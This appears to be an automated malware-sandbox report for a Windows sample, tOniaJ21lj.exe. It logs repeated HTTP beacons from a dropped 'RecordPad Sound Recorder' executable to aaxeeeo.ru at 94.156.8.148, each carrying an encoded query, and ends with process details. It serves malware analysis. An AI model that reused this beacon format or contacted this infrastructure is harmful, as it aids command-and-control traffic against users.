                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.55264594.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:34.748394012 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:35.887119055 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:35 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.2.55264694.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:36.034207106 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:37.149792910 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:36 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.2.55264794.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:37.280009985 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:38.431476116 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:38 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.55264894.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:38.697972059 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:39.895795107 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:39 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.55264994.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:40.013828039 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:41.235439062 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:41 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.2.55265094.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:41.371967077 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:42.636065960 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:42 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.2.55265194.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:42.763269901 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:43.944870949 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:43 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.2.55265294.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:44.076577902 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:45.210340977 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:45 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:45.320897102 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:45.771339893 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:45 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.2.55265394.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:45.889379025 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:46.944864035 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:46 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:47.055363894 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:47.475006104 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:47 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:47.586565971 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:48.005105972 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:47 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.2.55265494.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:48.123286963 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:49.296906948 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:49 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.2.55265594.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:49.420214891 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:50.627034903 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:50 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.2.55265694.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:50.748248100 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:52.371663094 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:52.372464895 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.2.55265794.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:52.482821941 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:53.605895042 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:53 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    37192.168.2.55265894.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:53.737195969 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:54.888930082 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:54 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    38192.168.2.55265994.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:55.016661882 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:56.189399958 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.2.55266094.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:56.313009024 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:57.440124035 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:57 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.2.55266194.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:57.593794107 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:58.732775927 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:58 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.2.55266294.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:58.873533964 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:44:00.119187117 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:59 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.2.55266394.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:44:00.280297995 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:44:01.524300098 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:44:01 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:13:41:54
                                                                                    Start date:11/06/2024
                                                                                    Path:C:\Users\user\Desktop\tOniaJ21lj.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\tOniaJ21lj.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:4'969'628 bytes
                                                                                    MD5 hash:FA367A7D44377D2C3F684C3912FEC827
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:13:41:54
                                                                                    Start date:11/06/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp" /SL5="$10474,4719378,54272,C:\Users\user\Desktop\tOniaJ21lj.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:696'832 bytes
